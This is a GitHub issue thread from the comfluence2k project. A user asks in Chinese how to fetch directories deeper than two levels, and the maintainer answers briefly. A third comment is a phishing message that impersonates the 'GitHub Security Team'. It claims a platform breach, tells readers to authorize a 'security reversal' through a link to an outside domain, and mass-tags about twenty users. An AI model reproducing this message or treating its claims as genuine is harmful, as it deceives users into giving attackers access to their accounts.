### ISSUE TITLE
如果想要拉取所有目录，而不仅仅是2级，应该如何处理呢？

### ISSUE THREAD

**Issue by xieebajinzhi** [lqs469/comfluence2k#3]

**Comment by lqs469** [comment]
代码会以 id 拉取数据，并且拉取 id 目录 下面的所有文章和目录，包括 2 级目录。

**Comment by guohaoyu110** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
lifenautjoe, @milksense, @eisenheimjelid, @Gounlaf, @vinicius98s, @daalekz, @Kreshnik, @Kardelio, @shunsuke6, @benjaminlimjt, @ffrmns, @Technoprenerd, @xsoloking, @dsebastien, @John-Resident, @mallware, @Frodox, @refl3ction, @wuya2357, @daotoan-hd
